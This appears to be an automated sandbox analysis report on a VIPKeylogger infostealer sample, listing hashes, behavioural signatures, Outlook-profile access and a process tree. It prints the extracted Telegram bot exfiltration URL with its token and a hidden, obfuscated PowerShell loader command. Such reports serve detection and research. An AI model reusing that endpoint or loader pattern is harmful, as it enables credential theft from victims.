Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-12-2024 02:40
Static task
static1
Behavioral task
behavioral1
Sample
4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
General
-
Target
4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe
-
Size
1.0MB
-
MD5
68ad57514cfb4e1cb4529556dbbc9b73
-
SHA1
3681d090c965cd8af1c7bffd6fe5427e997daa41
-
SHA256
4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac
-
SHA512
f2ef34f8ad5282676bdc3913007d471cc59e1bf20c5371817b3c85a2c24c19983d3c6c2f5e00bb539fc6596a0b02b4a33e59a4391a4165c22e0cbf2edd103f5a
-
SSDEEP
24576:ENrNYo6GP6fzfqUC1tkth3VwV5k7j5awX300zQUGtZq:U+S6fziUC1wh3VwXgj5aEkHUGtZq
Malware Config
Extracted
vipkeylogger
https://api.telegram.org/bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendMessage?chat_id=7763958191
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 848 powershell.exe -
Loads dropped DLL 1 IoCs
pid Process 2304 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 34 3480 msiexec.exe 36 3480 msiexec.exe 38 3480 msiexec.exe 40 3480 msiexec.exe 44 3480 msiexec.exe 47 3480 msiexec.exe 50 3480 msiexec.exe 55 3480 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 33 drive.google.com 34 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 46 checkip.dyndns.org -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\stilhederne\tamtammens.ini 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3480 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 848 powershell.exe 3480 msiexec.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\inddatafunktionens.Tra 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 848 powershell.exe 848 powershell.exe 848 powershell.exe 848 powershell.exe 848 powershell.exe 848 powershell.exe 848 powershell.exe 3480 msiexec.exe 3480 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 848 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 848 powershell.exe Token: SeIncreaseQuotaPrivilege 848 powershell.exe Token: SeSecurityPrivilege 848 powershell.exe Token: SeTakeOwnershipPrivilege 848 powershell.exe Token: SeLoadDriverPrivilege 848 powershell.exe Token: SeSystemProfilePrivilege 848 powershell.exe Token: SeSystemtimePrivilege 848 powershell.exe Token: SeProfSingleProcessPrivilege 848 powershell.exe Token: SeIncBasePriorityPrivilege 848 powershell.exe Token: SeCreatePagefilePrivilege 848 powershell.exe Token: SeBackupPrivilege 848 powershell.exe Token: SeRestorePrivilege 848 powershell.exe Token: SeShutdownPrivilege 848 powershell.exe Token: SeDebugPrivilege 848 powershell.exe Token: SeSystemEnvironmentPrivilege 848 powershell.exe Token: SeRemoteShutdownPrivilege 848 powershell.exe Token: SeUndockPrivilege 848 powershell.exe Token: SeManageVolumePrivilege 848 powershell.exe Token: 33 848 powershell.exe Token: 34 848 powershell.exe Token: 35 848 powershell.exe Token: 36 848 powershell.exe Token: SeDebugPrivilege 3480 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 2304 wrote to memory of 848 2304 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe 88 PID 2304 wrote to memory of 848 2304 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe 88 PID 2304 wrote to memory of 848 2304 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe 88 PID 848 wrote to memory of 3480 848 powershell.exe 97 PID 848 wrote to memory of 3480 848 powershell.exe 97 PID 848 wrote to memory of 3480 848 powershell.exe 97 PID 848 wrote to memory of 3480 848 powershell.exe 97 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe"C:\Users\Admin\AppData\Local\Temp\4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe"1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\Admin\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3480
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
290KB
MD5ac443ed3bcda8fd27eab8e4719631588
SHA16e501a1d2959a2279c67ff2b635950b72c537df8
SHA256050e2941abcf6621568720f75c7d27b1bc7b57f4a2db95dd44701aab68996042
SHA512f4e6440cecee0b5c2197e1f77757501b45cfa1fb14389944b3f775e5611accf946a1d6625e8758592636f26f05f41aed7309de4b6cae22cb1a3b8d18730df69c
-
Filesize
69KB
MD55c166ac0df5b33d27a3157ff3484b1d8
SHA114f38ae3f4ed43ab6f47cad5859e4494408092c5
SHA256c1203a1fc75a7592b8916f61c403ca3eebed1b1d84cd3c7eaa89187ee665229c
SHA51289a6e8a42ac4fc4b8618c3e79300126e49128c238e91f557a573edd7905a8fb35cb601e422b0a55ee74ccbb274e228314cf27741e8b3b70b532d3980328e89b1
-
Filesize
7KB
MD5675c4948e1efc929edcabfe67148eddd
SHA1f5bdd2c4329ed2732ecfe3423c3cc482606eb28e
SHA2561076ca39c449ed1a968021b76ef31f22a5692dfafeea29460e8d970a63c59906
SHA51261737021f86f54279d0a4e35db0d0808e9a55d89784a31d597f2e4b65b7bbeec99aa6c79d65258259130eeda2e5b2820f4f1247777a3010f2dc53e30c612a683